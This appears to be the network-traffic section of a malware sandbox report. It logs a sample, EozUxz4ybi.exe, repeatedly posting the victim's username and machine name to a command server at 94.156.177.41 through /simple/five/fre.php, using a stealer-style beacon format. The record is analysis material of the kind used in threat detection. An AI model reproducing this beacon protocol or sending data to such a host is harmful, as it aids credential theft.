Jan 11, 2025 01:43:29.581001997 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:29 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.8	51258	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:29.737620115 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:29.742691040 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:30.499888897 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:30 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.8	51259	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:30.872328997 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:30.877186060 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:31.580795050 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:31 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.8	51260	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:31.742301941 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:31.748334885 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:32.450759888 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:32 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.8	51261	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:32.602880955 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:32.607831001 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:33.314687967 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:33 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.8	51262	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:33.944672108 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:33.949544907 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:34.658876896 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:34 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.8	51263	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:34.809350967 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:34.814321995 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:35.532752037 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:35 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.8	51264	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:35.680735111 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:35.685741901 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:36.403749943 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:36 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.8	51266	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:36.559978008 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:36.565084934 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:37.315417051 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:37 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.8	51273	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:37.480484962 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:37.485335112 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:38.226561069 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:38 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.8	51280	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:38.382016897 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:38.387022972 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:39.084547043 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:38 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.8	51289	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:39.241821051 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:39.246712923 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:39.967514992 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.8	51297	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:40.179362059 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:40.188662052 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:40.906372070 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:40 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.8	51303	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:41.058645964 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:41.063388109 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:41.803119898 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:41 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.8	51309	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:42.031352043 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:42.036689997 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:42.794162035 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:42 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.8	51315	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:42.948031902 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:42.952923059 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:43.674802065 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:43 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.8	51321	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:43.897336006 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:43.902307987 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:44.613955975 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:44 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.8	51327	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:44.778259039 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:44.785245895 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:45.582261086 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:45 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.8	51333	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:45.731091022 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:45.736145973 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:46.438195944 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.8	51339	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:46.589720011 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:46.597242117 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:47.295649052 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:47 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.8	51346	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:47.452958107 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:47.457823038 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:48.196427107 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.8	51353	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:48.353506088 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:48.358447075 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:49.076029062 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.8	51360	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:49.230825901 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:49.238276958 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
